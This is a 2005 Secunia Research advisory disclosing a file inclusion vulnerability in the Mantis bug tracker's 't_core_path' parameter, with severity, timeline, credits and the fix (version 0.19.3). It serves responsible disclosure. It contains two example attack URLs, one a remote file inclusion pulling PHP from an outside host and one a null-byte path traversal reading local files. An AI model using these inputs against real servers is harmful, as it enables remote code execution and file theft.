secunia-Mantis.txt

`======================================================================  
  
Secunia Research 26/10/2005  
  
- Mantis "t_core_path" File Inclusion Vulnerability -  
  
======================================================================  
Table of Contents  
  
Affected Software....................................................1  
Severity.............................................................2  
Vendor's Description of Software.....................................3  
Description of Vulnerability.........................................4  
Solution.............................................................5  
Time Table...........................................................6  
Credits..............................................................7  
About Secunia........................................................8  
Verification.........................................................9  
  
======================================================================  
1) Affected Software  
  
Mantis 0.19.2 and 1.0.0rc2.  
  
Other versions may also be affected.  
  
======================================================================  
2) Severity  
  
Rating: Highly critical  
Impact: System access  
Where: Remote  
  
======================================================================  
3) Vendor's Description of Software  
  
Mantis is a web-based bugtracking system. It is written in the PHP   
scripting language and requires the MySQL database and a webserver.  
  
Product link:  
http://www.mantisbt.org/  
  
======================================================================  
4) Description of Vulnerability  
  
Secunia Research has discovered a vulnerability in Mantis, which can   
be exploited by malicious people to compromise a vulnerable system.  
  
Input passed to the "t_core_path" parameter in   
"bug_sponsorship_list_view_inc.php" isn't properly verified, before   
it used to include files. This can be exploited to include arbitrary   
files from external and local resources.  
  
Examples:  
http://[host]/bug_sponsorship_list_view_inc.php?  
t_core_path=http://[host]/[file].php?  
http://[host]/bug_sponsorship_list_view_inc.php?  
t_core_path=../../../../../../../[file]%00  
  
Successful exploitation requires that "register_globals" is enabled   
(not recommended setting).  
  
The vulnerability has been confirmed in versions 0.19.2 and 1.0.0rc2.   
Other versions may also be affected.  
  
======================================================================  
5) Solution  
  
Update to version 0.19.3.  
http://sourceforge.net/project/showfiles.php?group_id=14963  
  
======================================================================  
6) Time Table  
  
19/09/2005 - Vulnerability discovered.  
19/09/2005 - Vendor notified.  
11/10/2005 - Vendor issues new version.  
26/10/2005 - Public disclosure.  
  
======================================================================  
7) Credits  
  
Discovered by Andreas Sandblad, Secunia Research.  
  
======================================================================  
8) About Secunia  
  
Secunia collects, validates, assesses, and writes advisories regarding  
all the latest software vulnerabilities disclosed to the public. These  
advisories are gathered in a publicly available database at the  
Secunia website:  
  
http://secunia.com/  
  
Secunia offers services to our customers enabling them to receive all  
relevant vulnerability information to their specific system  
configuration.  
  
Secunia offers a FREE mailing list called Secunia Security Advisories:  
  
http://secunia.com/secunia_security_advisories/  
  
======================================================================  
9) Verification  
  
Please verify this advisory by visiting the Secunia website:  
http://secunia.com/secunia_research/2005-46/advisory/  
  
======================================================================  
  
  
  
`